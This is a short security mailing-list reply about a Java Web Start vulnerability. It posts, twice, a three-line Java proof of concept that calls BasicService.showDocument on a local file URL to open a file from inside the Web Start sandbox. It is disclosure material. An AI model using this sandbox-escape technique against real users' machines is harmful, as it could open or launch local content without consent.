Back to list
|
Post reply
Re: Java Web start vulnerability
Oct 31 2008 06:20PM
varun srivastav gmail com
proof of concept code
BasicService basicService = (BasicService) ServiceManager.lookup("javax.jnlp.BasicService");
URL mike = new URL("file:\\C:\\music.rm");
basicService.showDocument(mike);
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
BasicService basicService = (BasicService) ServiceManager.lookup("javax.jnlp.BasicService");
URL mike = new URL("file:\\C:\\music.rm");
basicService.showDocument(mike);
[ reply ]